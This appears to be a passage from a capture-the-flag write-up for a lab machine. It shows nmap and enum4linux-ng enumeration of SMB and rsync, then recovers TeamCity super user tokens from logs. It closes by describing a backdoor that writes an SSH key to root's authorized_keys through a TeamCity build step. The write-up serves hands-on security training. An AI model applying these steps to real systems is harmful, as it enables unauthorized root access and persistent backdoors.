Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Nov 7 18:20:32 2021 -- 1 IP address (1 host up) scanned in 56.43 seconds
$ enum4linux-ng -A vulnnetinternal.thm ... ====================================================== | OS Information via RPC for vulnnetinternal.thm | ====================================================== [*] Enumerating via unauthenticated SMB session on 445/tcp [+] Found OS information via SMB [*] Enumerating via 'srvinfo' [+] Found OS information via 'srvinfo' [+] After merging OS information we have the following result: OS: Linux/Unix (Samba 4.7.6-Ubuntu) OS version: '6.1' OS release: '' OS build: '0' Native OS: Windows 6.1 Native LAN manager: Samba 4.7.6-Ubuntu Platform id: '500' Server type: '0x809a03' Server type string: Sv PrQ Unx NT SNT vulnnet-internal server (Samba, Ubuntu) ... ============================================= | Shares via RPC on vulnnetinternal.thm | ============================================= [*] Enumerating shares [+] Found 3 share(s): IPC$: comment: IPC Service (vulnnet-internal server (Samba, Ubuntu)) type: IPC print$: comment: Printer Drivers type: Disk shares: comment: VulnNet Business Shares type: Disk [*] Testing share IPC$ [-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND [*] Testing share print$ [+] Mapping: DENIED, Listing: N/A [*] Testing share shares [+] Mapping: OK, Listing: OK ...
[+] IP: vulnnetinternal.thm:445 Name: unknown Status: Guest session Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers shares READ ONLY VulnNet Business Shares IPC$ NO ACCESS IPC Service (vulnnet-internal server (Samba, Ubuntu))
Let's open the available share with a capable SMB browser (in my case with dolphin):
$ nmap -sV --script "rsync-list-modules" -p 873 vulnnetinternal.thm Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-07 21:10 CET Nmap scan report for vulnnetinternal.thm (10.10.241.8) Host is up (0.023s latency).
PORT STATE SERVICE VERSION 873/tcp open rsync (protocol version 31) | rsync-list-modules: |_ files Necessary home interaction
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds
The token could be in the catalina configuration be it's read protected. So
let's see in the logs instead.
1 2 3 4 5 6 7
sys-internal@vulnnet-internal:~$ grep -ri token /TeamCity/logs/ 2>/dev/null /TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8-EDITED-5 (use empty username with the token as the password to access the server) /TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8-EDITED-5 (use empty username with the token as the password to access the server) /TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3-EDITED-6 (use empty username with the token as the password to access the server) /TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 5-EDITED-2 (use empty username with the token as the password to access the server) /TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3-EDITED-0 (use empty username with the token as the password to access the server) /TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3-EDITED-0 (use empty username with the token as the password to access the server)
Once authenticated, we can create a new project, add a build configuration,
add a build step of type Command Line that run a Custom script.
To backdoor the server as root we can write our SSH key to the root authorized_keys.
It will work because the default value of PermitRootLogin in sshd_config is
prohibit-password. So authenticating via SSH using a key is alright.